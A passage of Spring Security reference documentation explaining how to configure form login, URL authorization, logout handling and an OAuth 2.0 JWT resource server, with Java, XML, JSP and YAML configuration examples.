Spring or Spring MVC, you will need to pass `WebSecurityConfig` into the superclass to ensure the configuration is picked up.\nYou can find an example below:\n\n[source,java]\n----\nimport org.springframework.security.web.context.*;\n\npublic class SecurityWebApplicationInitializer\n\textends AbstractSecurityWebApplicationInitializer {\n\n\tpublic SecurityWebApplicationInitializer() {\n\t\tsuper(WebSecurityConfig.class);\n\t}\n}\n----\n\nThe `SecurityWebApplicationInitializer` will do the following things:\n\n* Automatically register the springSecurityFilterChain Filter for every URL in your application\n* Add a ContextLoaderListener that loads the <<jc-hello-wsca,WebSecurityConfig>>.\n\n=== AbstractSecurityWebApplicationInitializer with Spring MVC\n\nIf we were using Spring elsewhere in our application we probably already had a `WebApplicationInitializer` that is loading our Spring Configuration.\nIf we use the previous configuration we would get an error.\nInstead, we should register Spring Security with the existing `ApplicationContext`.\nFor example, if we were using Spring MVC our `SecurityWebApplicationInitializer` would look something like the following:\n\n[source,java]\n----\nimport org.springframework.security.web.context.*;\n\npublic class SecurityWebApplicationInitializer\n\textends AbstractSecurityWebApplicationInitializer {\n\n}\n----\n\nThis would only register the springSecurityFilterChain Filter for every URL in your application.\nAfter that we would ensure that `WebSecurityConfig` was loaded in our existing ApplicationInitializer.\nFor example, if we were using Spring MVC it would be added in `getRootConfigClasses()`:\n\n[[message-web-application-inititializer-java]]\n[source,java]\n----\npublic class MvcWebApplicationInitializer extends\n\t\tAbstractAnnotationConfigDispatcherServletInitializer {\n\n\t@Override\n\tprotected Class<?>[] getRootConfigClasses() {\n\t\treturn new Class[] { WebSecurityConfig.class };\n\t}\n\n\t\/\/ ... 
other overrides ...\n}\n----\n\n[[jc-httpsecurity]]\n== HttpSecurity\n\nThus far our <<jc-hello-wsca,WebSecurityConfig>> only contains information about how to authenticate our users.\nHow does Spring Security know that we want to require all users to be authenticated?\nHow does Spring Security know we want to support form based authentication?\nActually, there is a configuration class that is being invoked behind the scenes called `WebSecurityConfigurerAdapter`.\nIt has a method called `configure` with the following default implementation:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t authorizeRequests\n\t\t\t .anyRequest().authenticated()\n\t\t)\n\t\t.formLogin(withDefaults())\n\t\t.httpBasic(withDefaults());\n}\n----\n\nThe default configuration above:\n\n* Ensures that any request to our application requires the user to be authenticated\n* Allows users to authenticate with form based login\n* Allows users to authenticate with HTTP Basic authentication\n\nYou will notice that this configuration is quite similar to the XML Namespace configuration:\n\n[source,xml]\n----\n<http>\n\t<intercept-url pattern=\"\/**\" access=\"authenticated\"\/>\n\t<form-login \/>\n\t<http-basic \/>\n<\/http>\n----\n\n[[jc-form]]\n== Java Configuration and Form Login\nYou might be wondering where the login form came from when you were prompted to log in, since we made no mention of any HTML files or JSPs.\nSince Spring Security's default configuration does not explicitly set a URL for the login page, Spring Security generates one automatically, based on the features that are enabled and using standard values for the URL which processes the submitted login, the default target URL the user will be sent to after logging in, and so on.\n\nWhile the automatically generated log in page is convenient to get up and running quickly, most applications will want to provide their own login page.\nWhen we want to change the default configuration, we can customize the `WebSecurityConfigurerAdapter` that we mentioned earlier by extending it like so:\n\n[source,java]\n----\npublic class WebSecurityConfig extends WebSecurityConfigurerAdapter {\n\t\/\/ ...\n}\n----\n\nAnd then override the `configure` method as seen below:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t authorizeRequests\n\t\t\t .anyRequest().authenticated()\n\t\t)\n\t\t.formLogin(formLogin ->\n\t\t formLogin\n\t\t\t .loginPage(\"\/login\") \/\/ <1>\n\t\t\t .permitAll() \/\/ <2>\n\t );\n}\n----\n\n<1> The updated configuration specifies the location of the log in page.\n<2> We must grant all users (i.e. 
unauthenticated users) access to our log in page.\nThe `formLogin().permitAll()` method allows granting access to all users for all URLs associated with form based log in.\n\nAn example log in page implemented with JSPs for our current configuration can be seen below:\n\nNOTE: The login page below represents our current configuration.\nWe could easily update our configuration if some of the defaults do not meet our needs.\n\n[source,html]\n----\n<c:url value=\"\/login\" var=\"loginUrl\"\/>\n<form action=\"${loginUrl}\" method=\"post\"> <1>\n\t<c:if test=\"${param.error != null}\"> <2>\n\t\t<p>\n\t\t\tInvalid username and password.\n\t\t<\/p>\n\t<\/c:if>\n\t<c:if test=\"${param.logout != null}\"> <3>\n\t\t<p>\n\t\t\tYou have been logged out.\n\t\t<\/p>\n\t<\/c:if>\n\t<p>\n\t\t<label for=\"username\">Username<\/label>\n\t\t<input type=\"text\" id=\"username\" name=\"username\"\/>\t<4>\n\t<\/p>\n\t<p>\n\t\t<label for=\"password\">Password<\/label>\n\t\t<input type=\"password\" id=\"password\" name=\"password\"\/>\t<5>\n\t<\/p>\n\t<input type=\"hidden\" <6>\n\t\tname=\"${_csrf.parameterName}\"\n\t\tvalue=\"${_csrf.token}\"\/>\n\t<button type=\"submit\" class=\"btn\">Log in<\/button>\n<\/form>\n----\n\n<1> A POST to the `\/login` URL will attempt to authenticate the user\n<2> If the query parameter `error` exists, authentication was attempted and failed\n<3> If the query parameter `logout` exists, the user was successfully logged out\n<4> The username must be present as the HTTP parameter named __username__\n<5> The password must be present as the HTTP parameter named __password__\n<6> We must <<csrf-include-csrf-token>>.\nTo learn more, read the <<csrf>> section of the reference.\n
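\nOmitted above is how the `\/login` page itself gets served.\nA minimal sketch of a Spring MVC controller that could render it is shown below; the controller class and the view name `login` are illustrative assumptions and not part of the configuration above:\n\n[source,java]\n----\nimport org.springframework.stereotype.Controller;\nimport org.springframework.web.bind.annotation.GetMapping;\n\n@Controller\npublic class LoginController {\n\n\t\/\/ Renders the log in form; the \"login\" view name is assumed to resolve\n\t\/\/ to the JSP shown above through the application's ViewResolver.\n\t@GetMapping(\"\/login\")\n\tpublic String login() {\n\t\treturn \"login\";\n\t}\n}\n----\n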
\n[[jc-authorize-requests]]\n== Authorize Requests\nOur examples have only required users to be authenticated and have done so for every URL in our application.\nWe can specify custom requirements for our URLs by adding multiple children to our `http.authorizeRequests()` method.\nFor example:\n\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests -> \/\/ <1>\n\t\t authorizeRequests\n\t\t\t .antMatchers(\"\/resources\/**\", \"\/signup\", \"\/about\").permitAll() \/\/ <2>\n\t\t\t .antMatchers(\"\/admin\/**\").hasRole(\"ADMIN\") \/\/ <3>\n\t\t\t .antMatchers(\"\/db\/**\").access(\"hasRole('ADMIN') and hasRole('DBA')\") \/\/ <4>\n\t\t\t .anyRequest().authenticated() \/\/ <5>\n\t\t)\n\t\t.formLogin(withDefaults());\n}\n----\n\n<1> There are multiple children to the `http.authorizeRequests()` method; each matcher is considered in the order it was declared.\n<2> We specified multiple URL patterns that any user can access.\nSpecifically, any user can access a request if the URL starts with \"\/resources\/\", equals \"\/signup\", or equals \"\/about\".\n<3> Any URL that starts with \"\/admin\/\" will be restricted to users who have the role \"ROLE_ADMIN\".\nYou will notice that since we are invoking the `hasRole` method we do not need to specify the \"ROLE_\" prefix.\n<4> Any URL that starts with \"\/db\/\" requires the user to have both \"ROLE_ADMIN\" and \"ROLE_DBA\".\nYou will notice that since we are using the `hasRole` expression we do not need to specify the \"ROLE_\" prefix.\n<5> Any URL that has not already been matched only requires that the user be authenticated\n\n[[jc-logout]]\n== Handling Logouts\n\nWhen using the `{security-api-url}org\/springframework\/security\/config\/annotation\/web\/configuration\/WebSecurityConfigurerAdapter.html[WebSecurityConfigurerAdapter]`, logout capabilities are automatically applied.\nThe default is that accessing the URL `\/logout` will log the user out by:\n\n- Invalidating the HTTP Session\n- Cleaning up any RememberMe authentication that was configured\n- Clearing the `SecurityContextHolder`\n- Redirecting to `\/login?logout`\n\nSimilar to configuring login capabilities, you also have various options to further customize your logout requirements:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.logout(logout -> \/\/ <1>\n\t\t logout\n\t\t\t .logoutUrl(\"\/my\/logout\") \/\/ <2>\n\t\t\t .logoutSuccessUrl(\"\/my\/index\") \/\/ <3>\n\t\t\t .logoutSuccessHandler(logoutSuccessHandler) \/\/ <4>\n\t\t\t .invalidateHttpSession(true) \/\/ <5>\n\t\t\t .addLogoutHandler(logoutHandler) \/\/ <6>\n\t\t\t .deleteCookies(cookieNamesToClear) \/\/ <7>\n\t\t)\n\t\t...\n}\n----\n\n<1> Provides logout support.\nThis is automatically applied when using `WebSecurityConfigurerAdapter`.\n<2> The URL that triggers log out to occur (default is `\/logout`).\nIf CSRF protection is enabled (default), then the request must also be a POST.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutUrl-java.lang.String-[JavaDoc].\n<3> The URL to redirect to after logout has occurred.\nThe default is `\/login?logout`.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutSuccessUrl-java.lang.String-[JavaDoc].\n<4> Lets you specify a custom `LogoutSuccessHandler`.\nIf this is specified, `logoutSuccessUrl()` is ignored.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutSuccessHandler-org.springframework.security.web.authentication.logout.LogoutSuccessHandler-[JavaDoc].\n<5> Specify whether to invalidate the `HttpSession` at the time of logout.\nThis is *true* by default.\nConfigures the `SecurityContextLogoutHandler` under the covers.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#invalidateHttpSession-boolean-[JavaDoc].\n<6> Adds a `LogoutHandler`.\n`SecurityContextLogoutHandler` is added as the last `LogoutHandler` by default.\n<7> Allows specifying the names of cookies to be removed on logout success.\nThis is a shortcut for adding a `CookieClearingLogoutHandler` explicitly.\n\n[NOTE]\n===\nLogouts can of course also be configured using the XML Namespace notation.\nPlease see the documentation for the <<nsa-logout, logout element>> in the Spring Security XML Namespace section for further details.\n===\n\nGenerally, in order to customize logout functionality, you can add\n`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutHandler.html[LogoutHandler]`\nand\/or\n`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutSuccessHandler.html[LogoutSuccessHandler]`\nimplementations.\nFor many common scenarios, these handlers are applied under the\ncovers when using the fluent API.\n\n[[jc-logout-handler]]\n=== LogoutHandler\n\nGenerally, 
`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutHandler.html[LogoutHandler]`\nimplementations indicate classes that are able to participate in logout handling.\nThey are expected to be invoked to perform necessary clean-up.\nAs such they should\nnot throw exceptions.\nVarious implementations are provided:\n\n- {security-api-url}org\/springframework\/security\/web\/authentication\/rememberme\/PersistentTokenBasedRememberMeServices.html[PersistentTokenBasedRememberMeServices]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/rememberme\/TokenBasedRememberMeServices.html[TokenBasedRememberMeServices]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/CookieClearingLogoutHandler.html[CookieClearingLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/csrf\/CsrfLogoutHandler.html[CsrfLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/SecurityContextLogoutHandler.html[SecurityContextLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/HeaderWriterLogoutHandler.html[HeaderWriterLogoutHandler]\n\nPlease see <<remember-me-impls>> for details.\n\nInstead of providing `LogoutHandler` implementations directly, the fluent API also provides shortcuts that provide the respective `LogoutHandler` implementations under the covers.\nE.g. `deleteCookies()` allows specifying the names of one or more cookies to be removed on logout success.\nThis is a shortcut compared to adding a `CookieClearingLogoutHandler`.\n\n[[jc-logout-success-handler]]\n=== LogoutSuccessHandler\n\nThe `LogoutSuccessHandler` is called after a successful logout by the `LogoutFilter`, to handle e.g.\nredirection or forwarding to the appropriate destination.\nNote that the interface is almost the same as the `LogoutHandler` but may raise an exception.\n\nThe following implementations are provided:\n\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/SimpleUrlLogoutSuccessHandler.html[SimpleUrlLogoutSuccessHandler]\n- HttpStatusReturningLogoutSuccessHandler\n\nAs mentioned above, you don't need to specify the `SimpleUrlLogoutSuccessHandler` directly.\nInstead, the fluent API provides a shortcut by setting the `logoutSuccessUrl()`.\nThis will set up the `SimpleUrlLogoutSuccessHandler` under the covers.\nThe provided URL will be redirected to after a logout has occurred.\nThe default is `\/login?logout`.\n\nThe `HttpStatusReturningLogoutSuccessHandler` can be interesting in REST API type scenarios.\nInstead of redirecting to a URL upon the successful logout, this `LogoutSuccessHandler` allows you to provide a plain HTTP status code to be returned.\nIf not configured, a status code of 200 will be returned by default.\n
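\nFor example, a REST style configuration might look something like the sketch below; returning `204 No Content` is an illustrative choice rather than a requirement:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.logout(logout ->\n\t\t logout\n\t\t\t \/\/ return a bare status code instead of redirecting\n\t\t\t .logoutSuccessHandler(\n\t\t\t\t new HttpStatusReturningLogoutSuccessHandler(HttpStatus.NO_CONTENT))\n\t\t);\n}\n----\n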
\n[[jc-logout-references]]\n=== Further Logout-Related References\n\n- <<ns-logout, Logout Handling>>\n- <<test-logout, Testing Logout>>\n- <<servletapi-logout, HttpServletRequest.logout()>>\n- <<remember-me-impls>>\n- <<csrf-logout, Logging Out>> in section CSRF Caveats\n- Section <<cas-singlelogout, Single Logout>> (CAS protocol)\n- Documentation for the <<nsa-logout, logout element>> in the Spring Security XML Namespace section\n\n\ninclude::oauth2-client.adoc[]\n\ninclude::oauth2-login.adoc[]\n\n\n[[oauth2resourceserver]]\n== OAuth 2.0 Resource Server\n\nSpring Security supports protecting endpoints using https:\/\/tools.ietf.org\/html\/rfc7519[JWT]-encoded OAuth 2.0 https:\/\/tools.ietf.org\/html\/rfc6750.html[Bearer Tokens].\n\nThis is handy in circumstances where an application has federated its authority management out to an https:\/\/tools.ietf.org\/html\/rfc6749[authorization server] (for example, Okta or Ping Identity).\nThis authorization server can be consulted by Resource Servers to validate authority when serving requests.\n\n[NOTE]\n====\nA complete working example can be found in {gh-samples-url}\/boot\/oauth2resourceserver[*OAuth 2.0 Resource Server Servlet sample*].\n====\n\n=== Dependencies\n\nMost Resource Server support is collected into `spring-security-oauth2-resource-server`.\nHowever, the support for decoding and verifying JWTs is in `spring-security-oauth2-jose`, meaning that both are necessary in order to have a working resource server that supports JWT-encoded Bearer Tokens.\n
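\nWith Gradle, for example, declaring the two modules amounts to something like the following sketch (the versions are assumed to be supplied by dependency management, such as the Spring Boot plugin or the Spring Security BOM):\n\n```groovy\ndependencies {\n \/\/ bearer token support for resource servers\n implementation \"org.springframework.security:spring-security-oauth2-resource-server\"\n \/\/ JWT decoding and verification\n implementation \"org.springframework.security:spring-security-oauth2-jose\"\n}\n```\n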
\n[[oauth2resourceserver-minimalconfiguration]]\n=== Minimal Configuration\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the location of the authorization server.\n\n==== Specifying the Authorization Server\n\nTo specify which authorization server to use, simply do:\n\n```yaml\nsecurity:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\n```\n\nWhere `https:\/\/idp.example.com` is the value contained in the `iss` claim for JWT tokens that the authorization server will issue.\nResource Server will use this property to further self-configure, discover the authorization server's public keys, and subsequently validate incoming JWTs.\n\n[NOTE]\nTo use the `issuer-uri` property, it must also be true that `https:\/\/idp.example.com\/.well-known\/openid-configuration` is a supported endpoint for the authorization server.\nThis endpoint is referred to as a https:\/\/openid.net\/specs\/openid-connect-discovery-1_0.html#ProviderConfig[Provider Configuration] endpoint.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate JWT-encoded Bearer Tokens.\n\nIt achieves this through a deterministic startup process:\n\n1. Hit the Provider Configuration endpoint, `https:\/\/idp.example.com\/.well-known\/openid-configuration`, processing the response for the `jwks_url` property\n2. Configure the validation strategy to query `jwks_url` for valid public keys\n3. Configure the validation strategy to validate each JWT's `iss` claim against `https:\/\/idp.example.com`.\n\nA consequence of this process is that the authorization server must be up and receiving requests in order for Resource Server to successfully start up.\n\n[NOTE]\nIf the authorization server is down when Resource Server queries it (given appropriate timeouts), then startup will fail.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n```http\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n```\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven a well-formed JWT token, Resource Server will\n\n1. Validate its signature against a public key obtained from the `jwks_url` endpoint during startup and matched against the JWT's header\n2. Validate the JWT's `exp` and `nbf` timestamps and the JWT's `iss` claim, and\n3. Map each scope to an authority with the prefix `SCOPE_`.\n\n[NOTE]\nAs the authorization server makes available new keys, Spring Security will automatically rotate the keys used to validate the JWT tokens.\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `Jwt` object, and `Authentication#getName` maps to the JWT's `sub` property, if one is present.\n\nFrom here, consider jumping to:\n\n<<oauth2resourceserver-jwkseturi,How to Configure without Tying Resource Server startup to an authorization server's availability>>\n\n<<oauth2resourceserver-sansboot,How to Configure without Spring Boot>>\n\n[[oauth2resourceserver-jwkseturi]]\n=== Specifying the Authorization Server JWK Set Uri Directly\n\nIf the authorization server doesn't support the Provider Configuration endpoint, or if Resource Server must be able to start up independently from the authorization server, then `issuer-uri` can be exchanged for `jwk-set-uri`:\n\n```yaml\nsecurity:\n oauth2:\n resourceserver:\n jwt:\n jwk-set-uri: https:\/\/idp.example.com\/.well-known\/jwks.json\n```\n\n[NOTE]\nThe JWK Set URI is not standardized, but it can typically be found in the authorization server's documentation.\n\nConsequently, Resource Server will not ping the authorization server at startup.\nHowever, it will also no longer validate the `iss` claim in the JWT (since Resource Server no longer knows what the issuer value should be).\n\n[NOTE]\nThis property can also be supplied directly on the <<oauth2resourceserver-jwkseturi-dsl,DSL>>.\n\n[[oauth2resourceserver-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server:\n\n```java\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(withDefaults())\n );\n}\n```\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n```java\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwtAuthenticationConverter(myConverter())\n )\n );\n }\n}\n```\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is a `JwtDecoder`, which decodes `String` tokens into validated instances of `Jwt`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return JwtDecoders.fromOidcIssuerLocation(issuerUri);\n}\n```\n\nIf the application doesn't expose a `JwtDecoder` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `jwkSetUri()` or replaced using `decoder()`.\n\n[[oauth2resourceserver-jwkseturi-dsl]]\n==== Using 
`jwkSetUri()`\n\nAn authorization server's JWK Set Uri can be configured <<oauth2resourceserver-jwkseturi,as a configuration property>> or it can be supplied in the DSL:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwkSetUri(\"https:\/\/idp.example.com\/.well-known\/jwks.json\")\n )\n );\n }\n}\n```\n\nUsing `jwkSetUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-decoder-dsl]]\n==== Using `decoder()`\n\nMore powerful than `jwkSetUri()` is `decoder()`, which will completely replace any Boot auto configuration of `JwtDecoder`:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .decoder(myCustomDecoder())\n )\n );\n }\n}\n```\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-validation,validation>>, <<oauth2resourceserver-claimsetmapping,mapping>>, or <<oauth2resourceserver-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-decoder-bean]]\n==== Exposing a `JwtDecoder` `@Bean`\n\nOr, exposing a `JwtDecoder` `@Bean` has the same effect as `decoder()`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n}\n```\n\n[[oauth2resourceserver-authorization]]\n=== Configuring Authorization\n\nA JWT that is issued from an OAuth 2.0 Authorization Server will typically either have a `scope` or `scp` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from a JWT, the corresponding expressions should include this prefix:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(withDefaults())\n );\n }\n}\n```\n\nOr similarly with method security:\n\n```java\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) 
{}\n```\n\n[[oauth2resourceserver-authorization-extraction]]\n==== Extracting Authorities Manually\n\nHowever, there are a number of circumstances where this default is insufficient.\nFor example, some authorization servers don't use the `scope` attribute, but instead have their own custom attribute.\nOr, at other times, the resource server may need to adapt the attribute or a composition of attributes into internalized authorities.\n\nTo this end, the DSL exposes `jwtAuthenticationConverter()`:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwtAuthenticationConverter(grantedAuthoritiesExtractor())\n )\n );\n }\n}\n\nConverter<Jwt, AbstractAuthenticationToken> grantedAuthoritiesExtractor() {\n JwtAuthenticationConverter jwtAuthenticationConverter =\n new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter\n (new GrantedAuthoritiesExtractor());\n return jwtAuthenticationConverter;\n}\n```\n\nwhich is responsible for converting a `Jwt` into an `Authentication`.\nAs part of its configuration, we can supply a subsidiary converter to go from `Jwt` to a `Collection` of `GrantedAuthority`s.\n\nThat final converter might be something like `GrantedAuthoritiesExtractor` below:\n\n```java\nstatic class GrantedAuthoritiesExtractor\n implements Converter<Jwt, Collection<GrantedAuthority>> {\n\n public Collection<GrantedAuthority> convert(Jwt jwt) {\n Collection<String> authorities = (Collection<String>)\n jwt.getClaims().get(\"mycustomclaim\");\n\n return authorities.stream()\n .map(SimpleGrantedAuthority::new)\n .collect(Collectors.toList());\n }\n}\n```\n\nFor more flexibility, the DSL supports entirely replacing the converter with any class that implements `Converter<Jwt, AbstractAuthenticationToken>`:\n\n```java\nstatic class CustomAuthenticationConverter implements Converter<Jwt, AbstractAuthenticationToken> {\n public AbstractAuthenticationToken convert(Jwt jwt) {\n return new CustomAuthenticationToken(jwt);\n }\n}\n```\n\n[[oauth2resourceserver-validation]]\n=== Configuring Validation\n\nUsing <<oauth2resourceserver-minimalconfiguration,minimal Spring Boot configuration>>, indicating the authorization server's issuer URI, Resource Server will default to verifying the `iss` claim as well as the `exp` and `nbf` timestamp claims.\n\nIn circumstances where validation needs to be customized, Resource Server ships with two standard validators and also accepts custom `OAuth2TokenValidator` instances.\n\n[[oauth2resourceserver-validation-clockskew]]\n==== Customizing Timestamp Validation\n\nJWTs typically have a window of validity, with the start of the window indicated in the `nbf` claim and the end indicated in the `exp` claim.\n\nHowever, every server can experience clock drift, which can cause tokens to appear expired to one server, but not to another.\nThis can cause some implementation heartburn as the number of collaborating servers increases in a distributed system.\n\nResource Server uses `JwtTimestampValidator` to verify a token's validity window, and it can be configured with a `clockSkew` to alleviate the above problem:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n 
JwtDecoders.fromOidcIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> withClockSkew = new DelegatingOAuth2TokenValidator<>(\n new JwtTimestampValidator(Duration.ofSeconds(60)),\n new IssuerValidator(issuerUri));\n\n jwtDecoder.setJwtValidator(withClockSkew);\n\n return jwtDecoder;\n}\n```\n\n[NOTE]\nBy default, Resource Server configures a clock skew of 30 seconds.\n\n[[oauth2resourceserver-validation-custom]]\n==== Configuring a Custom Validator\n\nAdding a check for the `aud` claim is simple with the `OAuth2TokenValidator` API:\n\n```java\npublic class AudienceValidator implements OAuth2TokenValidator<Jwt> {\n OAuth2Error error = new OAuth2Error(\"invalid_token\", \"The required audience is missing\", null);\n\n public OAuth2TokenValidatorResult validate(Jwt jwt) {\n if (jwt.getAudience().contains(\"messaging\")) {\n return OAuth2TokenValidatorResult.success();\n } else {\n return OAuth2TokenValidatorResult.failure(error);\n }\n }\n}\n```\n\nThen, to add it into a resource server, it's a matter of specifying the `JwtDecoder` instance:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromOidcIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> audienceValidator = new AudienceValidator();\n OAuth2TokenValidator<Jwt> withIssuer = JwtValidators.createDefaultWithIssuer(issuerUri);\n OAuth2TokenValidator<Jwt> withAudience = new DelegatingOAuth2TokenValidator<>(withIssuer, audienceValidator);\n\n jwtDecoder.setJwtValidator(withAudience);\n\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-claimsetmapping]]\n=== Configuring Claim Set Mapping\n\nSpring Security uses the https:\/\/bitbucket.org\/connect2id\/nimbus-jose-jwt\/wiki\/Home[Nimbus] library for parsing JWTs and validating their signatures.\nConsequently, Spring Security is subject to Nimbus's interpretation of each field value and how to coerce each into a Java type.\n\nFor example, because Nimbus remains Java 7 compatible, it doesn't use `Instant` to represent timestamp fields.\n\nAnd it's entirely possible to use a different library for JWT processing, which may make its own coercion decisions that need adjustment.\n\nOr, quite simply, a resource server may want to add or remove claims from a JWT for domain-specific reasons.\n\nFor these purposes, Resource Server supports mapping the JWT claim set with `MappedJwtClaimSetConverter`.\n\n[[oauth2resourceserver-claimsetmapping-singleclaim]]\n==== Customizing the Conversion of a Single Claim\n\nBy default, `MappedJwtClaimSetConverter` will attempt to coerce claims into the following types:\n\n|============\n| Claim | Java Type\n| `aud` | `Collection<String>`\n| `exp` | `Instant`\n| `iat` | `Instant`\n| `iss` | `String`\n| `jti` | `String`\n| `nbf` | `Instant`\n| `sub` | `String`\n|============\n\nAn individual claim's conversion strategy can be configured using `MappedJwtClaimSetConverter.withDefaults`:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n\n MappedJwtClaimSetConverter converter = MappedJwtClaimSetConverter\n .withDefaults(Collections.singletonMap(\"sub\", this::lookupUserIdBySub));\n jwtDecoder.setClaimSetConverter(converter);\n\n return jwtDecoder;\n}\n```\nThis will keep all the defaults, except it will override the default claim converter for `sub`.\n
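\nThe `lookupUserIdBySub` reference above is a placeholder for application code.\nA sketch of what such a method might look like is shown below; the `userRepository` and its `findUserIdBySubject` method are assumptions made for the sake of the example:\n\n```java\nprivate Object lookupUserIdBySub(Object sub) {\n \/\/ translate the token's subject into this application's internal user id;\n \/\/ how the lookup happens is entirely application-specific\n return this.userRepository.findUserIdBySubject((String) sub);\n}\n```\n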
